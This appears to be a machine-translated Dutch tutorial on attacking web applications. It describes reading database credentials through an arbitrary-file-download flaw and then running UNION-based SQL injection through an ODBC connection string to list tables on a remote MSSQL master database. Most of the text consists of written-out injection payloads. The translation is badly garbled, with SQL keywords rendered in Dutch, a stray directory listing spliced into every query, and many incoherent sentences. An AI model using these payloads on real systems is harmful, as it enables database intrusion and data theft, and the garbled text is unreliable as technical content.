Eerste punt betreft, heeft deze methode al een lange tijd geleden, maar over het hoofd met een rustige tijd voor te lang, al in het vergeten land. Dank Trace informatie. Worden vaak geconfronteerd met de kwetsbaarheid van willekeurige bestand te downloaden, de algemene methode van de behandeling is de database connectie weer te downloaden bestand en vervolgens de externe verbinding.
Worden vaak geconfronteerd met de kwetsbaarheid van willekeurige bestand te downloaden, de algemene methode van de behandeling is de database connectie terug te keren naar bestand te downloaden, daarna gaan de externe verbinding. Ideaal staat dan MSSQL en MySQL, met name in de database en de WEB is niet het geval van scheiding, Backup SHELL, export SHELL, kan gebruikt worden op vele manieren.
Maar als de database en web scheiding, maar kan geen toegang tot de database, met inbegrip van het netwerk, of andere middelen om een firewall te maken, zodat we geen verbinding kan maken externe database, kunnen we aannemen dat een deel van de opnieuw moeilijk, zo niet onmogelijk om een MSSQL injectie te vinden, in veel gevallen meestal hulpeloos.
Hier MSSQL als een voorbeeld, het gebeurde op een willekeurig bestand te downloaden beveiligingslek direct te vinden, onder de web.config terug te komen om te zien, met inbegrip van netwerk ontdekking in een databank, een halve dag zoeken niet vinden van de injectie, een kleine kanttekeningen, is er een station is jammer TOEGANG database. Guess de tafel en weer terug. Echter, de achtergrond is het station doelgroep bekend is, dan bereid om te lezen van het access point van de doelgroep point injectie administrator account. Sommige intuïtieve, gezien direct onder mijn lokale testresultaten:
Hier krijg je een simpel uitgangspunt, drie velden, ID, XM, XB, type ID-nummer, gevolgd door twee karakter.
Stel dat er mazen in het document, de uitvoering van de SQL-instructie selecteert u back-up bin conf config gegevens eshow_sitemap.html generate.sh log maint sitemap.html svn tmp van test whrere id = 1
Er zijn drie velden, we de Unie gezamenlijk onderzoek te gebruiken om overeenkomen met wat hij is (black-box 'CMS met de bestelling door velden of om het aantal brute-force te bepalen)
Selecteer Backup maken bin conf config gegevens eshow_sitemap.html generate.sh log maint sitemap.html svn tmp VAN test waarbij id = 999999 Unie kiezen boven een 1,2, de naam van [ODBC; Driver = SQL Server; UID = dbo; PWD = dba ; =*****; Server Database = master]. ku
Hier is de master-database heb ik een tabel met de naam KU, boven deze zoekopdracht, aangezien id = 999999 bestaat niet onder de actie van de gezamenlijke onderzoek-, web-inhoud op de oorspronkelijke toon de locatie van de database toegang show van onze structuur UNION query resultaten, de naam van het veld in een karakter display positie.
ku inhoud van deze tabel het veld naam wordt weergegeven in het web op de overeenkomstige positie, maar dit is duidelijk niet wat we willen, we willen dat de hele tabel structuur en de inhoud
Om kapitein als een voorbeeld, hier is de simulatie-uitkomsten, van tevoren heb ik al de structuur van de meester, handige kennen en de resultaten zullen worden vergeleken met de checksum klopt niet.
Selecteer Backup maken bin conf config gegevens eshow_sitemap.html generate.sh log maint sitemap.html svn tmp VAN test waarbij id = 999999 Unie kiezen boven een 1,2, tabel_naam van [ODBC; Driver = SQL Server; UID = dbo; PWD = dba ; =*****; Server Database = master]. information_schema.tables
Deze master database tabel naam kwam voor het eerst uit.
Kruip achter de naam van de tabel is eenvoudig.
Selecteer Backup maken bin conf config gegevens eshow_sitemap.html generate.sh log maint sitemap.html svn tmp VAN test waarbij id = 999999 Unie kiezen boven een 1,2, tabel_naam van [ODBC; Driver = SQL Server; UID = dbo; PWD = dba ; =*****; Server Database = master]. information_schema.tables waar tabel_naam niet in (selecteer top 1 tabel_naam van [ODBC; Driver = SQL Server; UID = dbo; PWD = dba; Server =****; Database = master]. information_schema.tables)
Inferieur ras klasse conventionele methode duw om de veldnamen en inhoud van de code te verkrijgen op grond van hun eigen omslachtig.
Als de database waar de ID is een karakter, dan
Selecteer Backup maken bin conf config gegevens eshow_sitemap.html generate.sh log maint sitemap.html svn tmp VAN test waarbij id = '999999 'Union Selecteer boven een 1,2, tabel_naam van [ODBC; Driver = SQL Server; UID = dbo; PWD = dba; =***; Server Database = master]. information_schema.tables waar '1 '= '1'